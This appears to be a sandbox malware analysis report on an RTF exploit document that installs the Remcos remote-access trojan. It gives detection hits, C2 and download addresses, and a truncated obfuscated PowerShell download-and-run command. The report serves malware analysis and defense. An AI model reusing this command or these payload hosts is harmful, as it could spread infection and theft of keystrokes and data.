                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 207.241.227.96:443 -> 192.168.2.22:49162
                Source: global trafficTCP traffic: 192.168.2.22:49162 -> 207.241.227.96:443

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49164 -> 45.90.89.98:8243
                Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 45.90.89.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 45.90.89.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.96:443 -> 192.168.2.22:49162
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: 45.90.89.98
                Source: global trafficTCP traffic: 192.168.2.22:49164 -> 45.90.89.98:8243
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /421/UNOST.txt HTTP/1.1Host: 45.90.89.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49165 -> 178.237.33.50:80
                Source: global trafficHTTP traffic detected: GET /421/seennewthingsentireworldseethethings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.90.89.123Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 207.241.227.96:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: unknownTCP traffic detected without corresponding DNS query: 45.90.89.123
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,9_2_0041B411
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{EA4CB5E2-DBE3-4260-9610-CCFF5325F098}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1Host: ia601706.us.archive.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /421/seennewthingsentireworldseethethings.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.90.89.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /421/UNOST.txt HTTP/1.1Host: 45.90.89.123Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123
                Source: powershell.exe, 00000008.00000002.398173022.00000000029D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123/421/UNOST.txt
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIF
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFj
                Source: EQNEDT32.EXE, 00000002.00000002.380189170.00000000005ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.90.89.123/421/seennewthingsentireworldseethethings.tIFr
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: RegAsm.exe, RegAsm.exe, 00000009.00000002.906391209.000000000093F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                Source: RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp&
                Source: powershell.exe, 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                Source: RegAsm.exe, 00000009.00000002.906391209.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp=
                Source: powershell.exe, 00000008.00000002.398059563.000000000078A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: powershell.exe, 00000006.00000002.402026819.0000000002781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.398173022.0000000002781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000008.00000002.398173022.00000000028B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org
                Source: powershell.exe, 00000008.00000002.397979353.0000000000530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg
                Source: powershell.exe, 00000006.00000002.402026819.0000000002970000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ia601706.us.archive.org/2/items/new_image_LR
                Source: powershell.exe, 00000008.00000002.398638126.00000000037A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000008.00000002.400552613.0000000004D80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to register a low level keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000009_2_0040A2F3
                Installs a global keyboard hook
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,9_2_004168FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard,9_2_0040B749
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,9_2_0040A41B
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR

                E-Banking Fraud

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Contains functionalty to change the wallpaper
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_0041CA73 SystemParametersInfoW,9_2_0041CA73

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: xnHel.rtf, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 8.2.powershell.exe.46deb20.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3536, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 3644, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: RegAsm.exe PID: 3752, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\~WRD0000.tmp, type: DROPPEDMatched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen
                Very long command line found
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9286
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 9286Jump to behavior
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgIDJump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? 